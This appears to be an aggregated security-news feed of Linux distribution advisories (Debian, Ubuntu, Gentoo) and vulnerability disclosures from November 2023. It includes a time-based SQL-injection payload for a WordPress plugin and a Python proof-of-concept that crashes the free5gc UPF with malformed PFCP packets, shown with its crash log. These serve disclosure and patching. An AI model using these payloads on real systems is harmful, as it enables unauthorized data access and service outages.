Debian Linux Security Advisory 5551-1 - Debian appears to have forgotten to put the actual details of the advisory in this advisory, but they recommend that you upgrade your chromium packages.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5551-1                   security@debian.orghttps://www.debian.org/security/                           Andres SalomonNovember 09, 2023                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2023-5996Debian Bug     : 1033136DSA text goes hereFor the oldstable distribution (bullseye), this problem has been fixedin version 119.0.6045.123-1~deb11u1.For the stable distribution (bookworm), this problem has been fixed inversion 119.0.6045.123-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEUAUk+X1YiTIjs19qZF0CR8NudjcFAmVMkqYACgkQZF0CR8Nudjf2GhAAvVpxu8qF2iC1AgZXcHMqj4gpOE0x3S+Ee/JbJAKLbsnwsejzhFPKCRPzcAyI6xPR7D12vPEEOvvfS5DTGuYfCoJ4LM02zLUMWZrA5jFc6tUFWQ1VZRYFhL7s7sfuiZTbBWNVDdhjzD6GTmaYgfgPTGbH78cJ3iCS6FWf8sxGF/Pm+2xDC8cZeKuDfQZfP3MboLvKpRzrUlFFxytSAJQoT4PPs1QKrc/ksEyTwaA+KCMiSn5nMbq03SNTx84DFlUiMZXFNBSBd6SvxI5WLivOP+Gs+60DTJ8rCmgsx5Mn5OI/k/iFVLo7RBb691LO5TNxOe58+M9iuktC/SPwSEDesIpKoPww9SNSm7X4q3Q06uuAWzqMmV34tqsaPstJuD6Pi0xY55QAZps+/XFAUrw5Utsq24dj08N0let8+ikOuAkd4eIniJlgvMBXs/0mcNj9lOcBBZ2ANplXtHMlv626YOm4JfDuCPmhOB4OZHhxgj9Sj2clPsNeF04vkYyT5t6le0Snc0JhojzayfGQeegonr64UZdNIydHGP0mKvjNyswaS6k6qUnTtW0khShzagF9GQYADK63jaUOhsrOWrFK0QRF/YrSGS9jgMimEWdav/YtNX/mz2y1r72d5R18c+020srE+R0VPIDGfnhLktC8J4SpK16V6U3/KuaeuZv9oK4==s8+l-----END PGP SIGNATURE-----

Debian Security Advisory 5551-1

Zephyr RTOS versions 3.5.0 and below suffer from a multitude of buffer overflow vulnerabilities.

Zephyr RTOS 3.x.0 Buffer Overflows

Ubuntu Security Notice 6465-3 - Yu Hao and Weiteng Chen discovered that the Bluetooth HCI UART driver in the Linux kernel contained a race condition, leading to a null pointer dereference vulnerability. A local attacker could use this to cause a denial of service. Lin Ma discovered that the Netlink Transformation subsystem in the Linux kernel contained a null pointer dereference vulnerability in some situations. A local privileged attacker could use this to cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-6465-3November 10, 2023linux-gke vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-gke: Linux kernel for Google Container Engine (GKE) systemsDetails:Yu Hao and Weiteng Chen discovered that the Bluetooth HCI UART driver inthe Linux kernel contained a race condition, leading to a null pointerdereference vulnerability. A local attacker could use this to cause adenial of service (system crash). (CVE-2023-31083)Lin Ma discovered that the Netlink Transformation (XFRM) subsystem in theLinux kernel contained a null pointer dereference vulnerability in somesituations. A local privileged attacker could use this to cause a denial ofservice (system crash). (CVE-2023-3772)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:   linux-image-5.15.0-1046-gke     5.15.0-1046.51   linux-image-gke                 5.15.0.1046.45   linux-image-gke-5.15            5.15.0.1046.45After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6465-3   https://ubuntu.com/security/notices/USN-6465-1   CVE-2023-31083, CVE-2023-3772Package Information:   https://launchpad.net/ubuntu/+source/linux-gke/5.15.0-1046.51

Ubuntu Security Notice USN-6465-3

Ubuntu Security Notice 6462-2 - Seth Jenkins discovered that the Linux kernel did not properly perform address randomization for a per-cpu memory management structure. A local attacker could use this to expose sensitive information or in conjunction with another kernel vulnerability. Yu Hao and Weiteng Chen discovered that the Bluetooth HCI UART driver in the Linux kernel contained a race condition, leading to a null pointer dereference vulnerability. A local attacker could use this to cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-6462-2November 10, 2023linux-iot vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-iot: Linux kernel for IoT platformsDetails:Seth Jenkins discovered that the Linux kernel did not properly performaddress randomization for a per-cpu memory management structure. A localattacker could use this to expose sensitive information (kernel memory) orin conjunction with another kernel vulnerability. (CVE-2023-0597)Yu Hao and Weiteng Chen discovered that the Bluetooth HCI UART driver inthe Linux kernel contained a race condition, leading to a null pointerdereference vulnerability. A local attacker could use this to cause adenial of service (system crash). (CVE-2023-31083)Lin Ma discovered that the Netlink Transformation (XFRM) subsystem in theLinux kernel contained a null pointer dereference vulnerability in somesituations. A local privileged attacker could use this to cause a denial ofservice (system crash). (CVE-2023-3772)It was discovered that the Siano USB MDTV receiver device driver in theLinux kernel did not properly handle device initialization failures incertain situations, leading to a use-after-free vulnerability. A physicallyproximate attacker could use this cause a denial of service (system crash).(CVE-2023-4132)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:   linux-image-5.4.0-1025-iot      5.4.0-1025.26After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6462-2   https://ubuntu.com/security/notices/USN-6462-1   CVE-2023-0597, CVE-2023-31083, CVE-2023-3772, CVE-2023-4132Package Information:   https://launchpad.net/ubuntu/+source/linux-iot/5.4.0-1025.26

Ubuntu Security Notice USN-6462-2

WordPress Contact Form to Any API plugin version 1.1.2 suffers from a remote SQL injection vulnerability.

    # Exploit Title: WP Plugins Contact Form to Any API <= 1.1.2 - SQL Injection# Date: 12-11-2023# Exploit Author: Arvandy# Software Link: https://wordpress.org/plugins/contact-form-to-any-api/# Vendor Homepage: https://www.itpathsolutions.com/# Version: 1.1.2 # Tested on: Windows, Linux# CVE: CVE-2023-32741# Product DescriptionContact form 7 to Any API is most powerful plugin to send cf7 data to any third party services. It can be use to send data to CRM or any REST API. Easy to use and User friendly settings. It also Save Contact Form 7 form submitted data to the database with advanced features like search and export data to csv or excel.# Vulnerability overviewThe Wordpress plugins Contact Form to Any API <= 1.1.2 is vulnerable to Blind SQL Injection (time-based) via the form_id parameter on the /wp-admin/edit.php endpoint. This vulnerability could lead to unauthorized data access and modification.# Proof of ConceptAffected Endpoint: /wp-admin/edit.php?post_type=cf7_to_any_api&page=cf7anyapi_entries&form_id=Affected Parameter: form_idpayload: 1 UNION SELECT NULL,NULL,NULL,NULL,NULL,SLEEP(5)-- -# RecommendationUpgrade to version 1.1.3

WordPress Contact Form To Any API 1.1.2 SQL Injection

Buffer Overflow vulnerability in free5gc 3.3.0, UPF 1.2.0, and SMF 1.2.0 allows attackers to cause a denial of service via crafted PFCP messages.

**Describe the bug**

While testing the free5gc UPF for some PFCP basic and security features, I could trigger several crashes when it receives special kind of PFCP messages (the secondary IE type is larger than 0x7fff). This could cause DOS of any UPF instance, all memory issues due to this kind of PFCP messages are caught by the GO memory runtime, which would casue a panic and crash.

**To Reproduce**

Steps to reproduce the behavior:

1.  Build the UPF with source code
2.  Run the bin/upf with default config/upfcfg.yaml
3.  Run the following POC python script

#!/usr/bin/env python3

import socket

udp\_socket \= socket.socket(socket.AF\_INET, socket.SOCK\_DGRAM)
udp\_socket.settimeout(1.0)

pfcp\_association\_setup\_request \= b'\\x20\\x05\\x00\\x1f\\x00\\x00\\x01\\x00\\x00\\x3c\\x00\\x05\\x00\\x0a\\x64\\xc8\\x64\\x00\\x60\\x00\\x04\\xe8\\x1f\\xdc\\x30\\x00\\x2b\\x00\\x06\\x21\\x00\\x00\\x00\\x00\\x00'

"""
 PFCP Heartbeat Request with a second IE whose type is 0xffff (larger than 0x7fff)
"""
pfcp\_heartbeat\_request \= b'\\x20\\x01\\x00\\x0f\\x00\\x00\\x00\\xff\\xff\\xff\\x00\\x00\\x60\\x00\\x04\\xe8\\x1f\\xdc\\x30'

udp\_socket.sendto(pfcp\_association\_setup\_request, ('127.0.0.8', 8805))
try:
   udp\_socket.recv(65535)
except Exception as exception:
   print(f"Receive failed: {exception}")

udp\_socket.sendto(pfcp\_heartbeat\_request, ('127.0.0.8', 8805))
try:
   udp\_socket.recv(65535)
except Exception as exception:
   print(f"Receive failed: {exception}")

udp\_socket.close()

**Expected behavior**

Any people could leverage this to cause DOS and resource consumption against a pool of UPF. As much as possible, check this kind of PFCP messages whose second IE type is larger than 0x7ffff, update handling logic or just drop them to avoid frequent crashes. This will greatly improve the availability, stability, and security of free5gc UPF.

**Screenshots**

No special screenshot is provided.

**Environment (please complete the following information):**

*   free5GC Version: v3.3.0
*   OS: Ubuntu 20.04
*   Kernel version: 5.4.5-050405-generic
*   go version: go1.21.1 linux/amd64

**Trace File****Configuration File**

No specific configuration is required.

**PCAP File**

No specific pcap file is provided.

**Log File**

time="2023-09-22T03:25:30.099608396+08:00" level="info" msg="UPF version:  \\n\\tNot specify ldflags (which link version) during go build\\n\\tgo version: go1.21.1 linux/amd64" CAT="Main" NF="UPF"
time="2023-09-22T03:25:30.099702825+08:00" level="info" msg="Read config from \[upfcfg.yaml\]" CAT="CFG" NF="UPF"
time="2023-09-22T03:25:30.102422644+08:00" level="info" msg="\==================================================" CAT="CFG" NF="UPF"
time="2023-09-22T03:25:30.102461710+08:00" level="info" msg="(\*factory.Config)(0xc0004bb0e0)({\\n\\tVersion: (string) (len=5) \\"1.0.3\\",\\n\\tDescription: (string) (len=31) \\"UPF initial local configuration\\",\\n\\tPfcp: (\*factory.Pfcp)(0xc00042d470)({\\n\\t\\tAddr: (string) (len=9) \\"127.0.0.8\\",\\n\\t\\tNodeID: (string) (len=9) \\"127.0.0.8\\",\\n\\t\\tRetransTimeout: (time.Duration) 1s,\\n\\t\\tMaxRetrans: (uint8) 3\\n\\t}),\\n\\tGtpu: (\*factory.Gtpu)(0xc00042d980)({\\n\\t\\tForwarder: (string) (len=5) \\"gtp5g\\",\\n\\t\\tIfList: (\[\]factory.IfInfo) (len=1 cap=1) {\\n\\t\\t\\t(factory.IfInfo) {\\n\\t\\t\\t\\tAddr: (string) (len=9) \\"127.0.0.8\\",\\n\\t\\t\\t\\tType: (string) (len=2) \\"N3\\",\\n\\t\\t\\t\\tName: (string) \\"\\",\\n\\t\\t\\t\\tIfName: (string) \\"\\",\\n\\t\\t\\t\\tMTU: (uint32) 0\\n\\t\\t\\t}\\n\\t\\t}\\n\\t}),\\n\\tDnnList: (\[\]factory.DnnList) (len=1 cap=1) {\\n\\t\\t(factory.DnnList) {\\n\\t\\t\\tDnn: (string) (len=8) \\"internet\\",\\n\\t\\t\\tCidr: (string) (len=12) \\"10.60.0.0/24\\",\\n\\t\\t\\tNatIfName: (string) \\"\\"\\n\\t\\t}\\n\\t},\\n\\tLogger: (\*factory.Logger)(0xc000023c40)({\\n\\t\\tEnable: (bool) true,\\n\\t\\tLevel: (string) (len=4) \\"info\\",\\n\\t\\tReportCaller: (bool) false\\n\\t})\\n})\\n" CAT="CFG" NF="UPF"
time="2023-09-22T03:25:30.102518017+08:00" level="info" msg="\==================================================" CAT="CFG" NF="UPF"
time="2023-09-22T03:25:30.102550910+08:00" level="info" msg="Log level is set to \[info\]" CAT="Main" NF="UPF"
time="2023-09-22T03:25:30.102559413+08:00" level="info" msg="Report Caller is set to \[false\]" CAT="Main" NF="UPF"
time="2023-09-22T03:25:30.114437499+08:00" level="info" msg="starting Gtpu Forwarder \[gtp5g\]" CAT="Main" NF="UPF"
time="2023-09-22T03:25:30.114705992+08:00" level="info" msg="GTP Address: \\"127.0.0.8:2152\\"" CAT="Main" NF="UPF"
time="2023-09-22T03:25:30.133751688+08:00" level="info" msg="buff netlink server started" CAT="BUFF" NF="UPF"
time="2023-09-22T03:25:30.133860807+08:00" level="info" msg="perio server started" CAT="Perio" NF="UPF"
time="2023-09-22T03:25:30.133875168+08:00" level="info" msg="Forwarder started" CAT="Gtp5g" NF="UPF"
time="2023-09-22T03:25:30.135060078+08:00" level="info" msg="starting pfcp server" CAT="PFCP" LAddr="127.0.0.8:8805" NF="UPF"
time="2023-09-22T03:25:30.135468767+08:00" level="info" msg="pfcp server started" CAT="PFCP" LAddr="127.0.0.8:8805" NF="UPF"
time="2023-09-22T03:25:30.135481293+08:00" level="info" msg="UPF started" CAT="Main" NF="UPF"
time="2023-09-22T03:25:44.317661998+08:00" level="info" msg="handleAssociationSetupRequest" CAT="PFCP" LAddr="127.0.0.8:8805" NF="UPF"
time="2023-09-22T03:25:44.317826268+08:00" level="info" msg="New node" CAT="PFCP" CPNodeID="10.100.200.100" LAddr="127.0.0.8:8805" NF="UPF"
time="2023-09-22T03:25:44.318770003+08:00" level="fatal" msg="panic: runtime error: slice bounds out of range \[7:5\]\\ngoroutine 17 \[running\]:\\nruntime/debug.Stack()\\n\\t/snap/go/10339/src/runtime/debug/stack.go:24 +0x5e\\ngithub.com/free5gc/go-upf/internal/pfcp.(\*PfcpServer).main.func1()\\n\\t/home/lee/Desktop/free5gc/NFs/upf/internal/pfcp/pfcp.go:86 +0x4a\\npanic({0x84f480?, 0xc0001c0150?})\\n\\t/snap/go/10339/src/runtime/panic.go:914 +0x21f\\ngithub.com/wmnsk/go-pfcp/ie.ParseMultiIEs({0xc0001c0140?, 0xc0001c0138?, 0x7f29fbf11548?})\\n\\t/home/lee/go/pkg/mod/github.com/wmnsk/go-pfcp@v0.0.17-0.20221027122420-36112307f93a/ie/ie.go:637 +0x185\\ngithub.com/wmnsk/go-pfcp/message.(\*HeartbeatRequest).UnmarshalBinary(0xc000182630, {0xc0001c0138, 0x15, 0x15})\\n\\t/home/lee/go/pkg/mod/github.com/wmnsk/go-pfcp@v0.0.17-0.20221027122420-36112307f93a/message/heartbeat-request.go:101 +0xb3\\ngithub.com/wmnsk/go-pfcp/message.Parse({0xc0001c0138, 0x15, 0x15})\\n\\t/home/lee/go/pkg/mod/github.com/wmnsk/go-pfcp@v0.0.17-0.20221027122420-36112307f93a/message/message.go:117 +0x325\\ngithub.com/free5gc/go-upf/internal/pfcp.(\*PfcpServer).main(0xc0001de0d0, 0xc0001d60d0)\\n\\t/home/lee/Desktop/free5gc/NFs/upf/internal/pfcp/pfcp.go:125 +0x48b\\ncreated by github.com/free5gc/go-upf/internal/pfcp.(\*PfcpServer).Start in goroutine 1\\n\\t/home/lee/Desktop/free5gc/NFs/upf/internal/pfcp/pfcp.go:222 +0xb8\\n" CAT="PFCP" LAddr="127.0.0.8:8805" NF="UPF"

CVE-2023-47346: [Bugs] UPF crash caused by PFCP messages whose 2rd IE type larger than 0x7fff · Issue #482 · free5gc/free5gc

Debian Linux Security Advisory 5550-1 - Multiple security vulnerabilities have been discovered in Cacti, a web interface for graphing of monitoring systems, which could result in cross-site scripting, SQL injection, an open redirect or command injection.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5550-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffNovember 08, 2023                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : cactiCVE ID         : CVE-2023-39357 CVE-2023-39359 CVE-2023-39361 CVE-2023-39362                  CVE-2023-39364 CVE-2023-39365 CVE-2023-39513 CVE-2023-39515                  CVE-2023-39516 CVE-2023-39514 CVE-2023-39512 CVE-2023-39510     CVE-2023-39366 Multiple security vulnerabilities have been discovered in Cacti, a webinterface for graphing of monitoring systems, which could result incross-site scripting, SQL injection, an open redirect or command injection. For the oldstable distribution (bullseye), these problems have been fixedin version 1.2.16+ds1-2+deb11u2.For the stable distribution (bookworm), these problems have been fixed inversion 1.2.24+ds1-1+deb12u1.We recommend that you upgrade your cacti packages.For the detailed security status of cacti please refer toits security tracker page at:https://security-tracker.debian.org/tracker/cactiFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmVMDYgACgkQEMKTtsN8TjYzmhAAny8lZgRdlKAadeOGxULyDwZMzGhq9zoHUX2otN3nwIuQEotG6m9/Lc3+IQNpase5cNYZZMlF7lA5u34cbHNmnVnraEARUnU1PwsFOjAamv8JWxEfyGEV/V0fSaj7TNBYarHBGGHXhX1uFYQXMyVSTGNWmof7AmvhHol+CqgxSfzhq5i/ue+dtnNAfx1pZ+SzznBJsndUeltEi8CdsIqcdGlldO0UWIj9G0pF2Fs6bvfi9heVKF1D1WaxUzjUZUdmSgzNZ3d6RAjhfA7ButjKdViaKjE93ARfOcl1I5kvR2whqe6RILkx+7NqoQ/JdR1uYbg7wmKPb5+zivmJWk+PBXXlncSTkzuUC9JTx/ypO5x4/op0SD/hz2YHhFonL4Y2tSgQGiAuBqYwWTBjy6NyX+59lKSrbNF2Dt1GdTtR1Dwvzxe8NneEV+kDMwgTEli9D0QDYu8pF6b8OegkK0UJk/gu6w/88xF+E4zTvoFjeXI/Wp9c0sN0zqgyUIWnLyhv5PVYa5TJt1W0RK9QmZyNJ6uLv0xS4LKf28TYU4rI8ilw4/w8lDFE3ox7pUuSa52b2cK5R5I9UXCwIuT+RQZD9QMu8/MFgbmBlI0fXol7Qr7BblK7vEy+HADgXcJQXJxhDcsIfy5YXNj1N1ps3My/FUD/Ui1gCM/4zt9sg9OMiJ4==Exbi-----END PGP SIGNATURE-----

Debian Security Advisory 5550-1

Debian Linux Security Advisory 5548-1 - Several vulnerabilities have been discovered in the OpenJDK Java runtime, which may result in denial of service.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5548-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
November 05, 2023                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : openjdk-17  
CVE ID         : CVE-2023-22025 CVE-2023-22081

Several vulnerabilities have been discovered in the OpenJDK Java runtime,  
which may result in denial of service.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 17.0.9+9-1~deb11u1.

For the stable distribution (bookworm), these problems have been fixed in  
version 17.0.9+9-1~deb12u1.

We recommend that you upgrade your openjdk-17 packages.

For the detailed security status of openjdk-17 please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/openjdk-17

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmVH8rMACgkQEMKTtsN8  
Tjahiw/+KV2CipWhe7kpI5GXnMkCH9lOIYYv6S/zSu3RpB/zEH72QoAfJVRPazNy  
6ubJtk1kbrkc/mo6RFRw+0yVuo8czZ2NiVYc7E+pmVdCu1QT+M1BlV6xhN9KntpY  
pw2V+/+toyi0lmMRl13FgMC9loUdBHJO7zHbfNCKZAQHoBt1JK1UChwKDUC+UeGr  
0A/4wk5gMaKLMizr5nSEXsJS1D0cnAeqogIU42G6MdHTQnF1dTtXOtA3VbS+AnAl  
cPea29ALDnpruizp/7pBCu4q9hGvCrKYHxZ5ZIwfS7shfYSN0qqAtqmsw8ZSnAp6  
MlPwbdKfYWFhujvT3prQEtgPqowK+sMjSRHvjZyXIYrYK6/ORduckVpSHN3Ue3V7  
UcFKiZvVrub6YB9nFB0fbHs7FL4N/Eb75n8B5OzaHM1RrH12NNKWw9aghHEMofQB  
Isai5wglPnERZqDOYuUnrwxBfsRKGbRsYl86wYCnDBYSDtO5o6Fdp5daZBtm40dl  
fo4GoM2FVlkIFKR/xLviQ/l+q8bc3jOcT4ZtgiVlYHD5YuunT9pMxOYHHMF4NeP7  
ve+hB46m3GxVgeu50L3e7bOLEDbsMwXbhzN+IvR1IBNuwEvXUWy0jg4GZJQ30u7b  
l10rG4HjAvcL0U/axHmQcaKZWwd9cc9EfbQMUTJ5UzuSN9YcutA=  
=vysv  
-----END PGP SIGNATURE-----

Debian Security Advisory 5548-1

Gentoo Linux Security Advisory 202311-2 - Multiple vulnerabilities have been discovered in Netatalk, which could lead to remote code execution Versions greater than or equal to 3.1.18 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202311-02  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Netatalk: Multiple Vulnerabilities including root remote code execution  
     Date: November 01, 2023  
     Bugs: #837623, #881259, #915354  
       ID: 202311-02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in Netatalk, which could  
lead to remote code execution

Background  
==========

Netatalk is a kernel level implementation of the AppleTalk Protocol  
Suite, which allows Unix hosts to act as file, print, and time servers  
for Apple computers. It includes several script utilities, including  
etc2ps.sh.

Affected packages  
=================

Package          Vulnerable    Unaffected  
---------------  ------------  ------------  
net-fs/netatalk  < 3.1.18      >= 3.1.18

Description  
===========

Multiple vulnerabilities have been discovered in Netatalk. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Netatalk users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-fs/netatalk-3.1.18"

References  
==========

[ 1 ] CVE-2021-31439  
      https://nvd.nist.gov/vuln/detail/CVE-2021-31439  
[ 2 ] CVE-2022-0194  
      https://nvd.nist.gov/vuln/detail/CVE-2022-0194  
[ 3 ] CVE-2022-22995  
      https://nvd.nist.gov/vuln/detail/CVE-2022-22995  
[ 4 ] CVE-2022-23121  
      https://nvd.nist.gov/vuln/detail/CVE-2022-23121  
[ 5 ] CVE-2022-23122  
      https://nvd.nist.gov/vuln/detail/CVE-2022-23122  
[ 6 ] CVE-2022-23123  
      https://nvd.nist.gov/vuln/detail/CVE-2022-23123  
[ 7 ] CVE-2022-23124  
      https://nvd.nist.gov/vuln/detail/CVE-2022-23124  
[ 8 ] CVE-2022-23125  
      https://nvd.nist.gov/vuln/detail/CVE-2022-23125  
[ 9 ] CVE-2022-45188  
      https://nvd.nist.gov/vuln/detail/CVE-2022-45188

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202311-02

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202311-02

Debian Linux Security Advisory 5546-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5546-1                   security@debian.org  
https://www.debian.org/security/                           Andres Salomon  
November 02, 2023                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : chromium  
CVE ID         : CVE-2023-5480 CVE-2023-5482 CVE-2023-5849 CVE-2023-5850   
                 CVE-2023-5851 CVE-2023-5852 CVE-2023-5853 CVE-2023-5854   
                 CVE-2023-5855 CVE-2023-5856 CVE-2023-5857 CVE-2023-5858   
                 CVE-2023-5859

Multiple security issues were discovered in Chromium, which could result  
in the execution of arbitrary code, denial of service or information  
disclosure.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 119.0.6045.105-1~deb11u1.

For the stable distribution (bookworm), these problems have been fixed in  
version 119.0.6045.105-1~deb12u1.

We recommend that you upgrade your chromium packages.

For the detailed security status of chromium please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/chromium

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEUAUk+X1YiTIjs19qZF0CR8NudjcFAmVFF04ACgkQZF0CR8Nu  
djdzWhAAwLgUKUHw7DKsOlj52comEvShKoVSVrMM34ZDpcIizK/MtkQm/d7GsOU2  
D6AV6pI4vjR7mlbFiN9l99VIGF919iFsQdXdrq+49m/YafFVV3Q2EMagvhDRFRoF  
DJLtNml9gaWgvLoN77Uh0HShpoSWpVc9cXq8w+Xq8mpu+c9dkzquigY0Q0VWZqOs  
munuVIouMH7RhhCAiL+uJ67f1rDW49OEFvcFTyGWrdzpAgWP61u9Zq3iC4S9ovZP  
UprMUQt6+1wDH3/Mp020/Ln1XhCXfnlsvjXAmpygegbRttJAHwWPTyfvX0+ZdZ2h  
uLqDcF7EEtox+mZfLdVJZZVJyYugsGO5tqRk8psc77o1eW3BTaOgdSUYoereOm6O  
/47UJvpqQYRSjN52/FTGHAkXJhjOQHi0/BzSwXsi1szeNbAAUUThhSa6tXev0eTN  
xgW5xwP40gHScHEzla4rXnM/uyE/cRwBzyiocMQJi3eOREAyMGxUktruRehCSUS1  
GtUzWmFOlwtMIDPuzfK2ZJE1iv4stkfzcZtwfpHKiCkqY5fmkeSNrhVP8PmsK0bk  
kGW9AHnsLpYJj1MGNuIaGF1AxcWT6n3DrkUU7X/0ETxpA+2EVIrzgkikuq8mFfHe  
iEoBHpVeY3/iF1coGhHLFhSRD1OHECJ7ydU46Ji9fPH9tqcmTb0=  
=/Wn5  
-----END PGP SIGNATURE-----

Tag

#linux